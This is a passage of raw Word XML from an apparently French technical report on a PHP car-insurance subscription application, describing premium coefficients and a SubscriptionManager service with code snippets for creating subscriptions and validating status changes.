          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>estimatedPrice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEEBCD9" w14:textId="77777777" w:rsidR="00325BC5" w:rsidRPr="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657B91AD" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="50909734" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E974B9">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chaque coefficient est calculé par une méthode privée dédiée. Par exemple, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getSeniorityCoef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pénalise les jeunes conducteurs : un permis de moins d'un an applique un coefficient de 1.8, tandis qu'un conducteur expérimenté de plus de 20 ans bénéficie d'un coefficient de 0.90. Le coefficient véhicule (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getVehicleValueCoef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) n'est activé que pour la formule « Tous risques » et estime la valeur actuelle du véhicule en appliquant une décote annuelle de 10 %.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56057B4F" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="2B58623D" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E974B9">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc233817780"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Gestion du cycle de vie d'une souscription</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="78BD7E25" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E974B9">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubscriptionManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> orchestre les transitions d'état d'une souscription. La méthode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>completeSubscription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> crée une nouvelle souscription à partir d'un devis validé et génère un numéro de référence unique à partir des initiales de l'utilisateur et d'un identifiant unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D564B" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="608C7E2A"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SubscriptionManager.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08D0F8D0"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completeSubscription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Quote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795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>): ?Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E5F816"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386B4A7F"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$reference</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getUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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getFname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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0715B03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getUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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getLname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98658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661541A2"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uniqid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5883CB07"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sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5310A9F4"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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</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Subscription</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4154CA6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setReferenceNumber</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$reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE4FC26"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setStatus</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795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Subscription</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PENDING_DOCUMENTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA22E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-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setSubmittedAt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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w: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795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DateTimeImmutable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'now'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4509134A" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>setUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>getUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835D9E6" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        -&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>setQuote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F50222" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F80F6" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00555B5E" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>subscription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E31017" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00555B5E" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CBFD85" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="7AC99248" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E974B9">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La méthode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>changeStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> protège les transitions illégales : seuls les statuts VALIDATED, DOCUMENTS_INVALID et REJECTED sont acceptés. Toute tentative d'appliquer un statut non autorisé retourne </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et aucune modification n'est effectuée en base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FDD27D" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="7031CEBF"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SubscriptionManager.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41D564A8"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changeStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Subscription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string</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statusTarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>): ?string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328350D5"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72C0C00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acceptedStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67931B9D"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Subscription</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VALIDATED</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11973EDD"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Subscription</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DOCUMENTS_INVALID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72535C2E"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795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Subscription</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REJECTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03043DE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
    <w:p w14:paraId="54C6D39A"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if</w:t>
      </w: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795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in_array</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statusTarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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acceptedStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB0A63E"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null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E68D90"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
    <w:p w14:paraId="48D19C83"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if</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statusTarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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getStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6E2735" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>flashMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
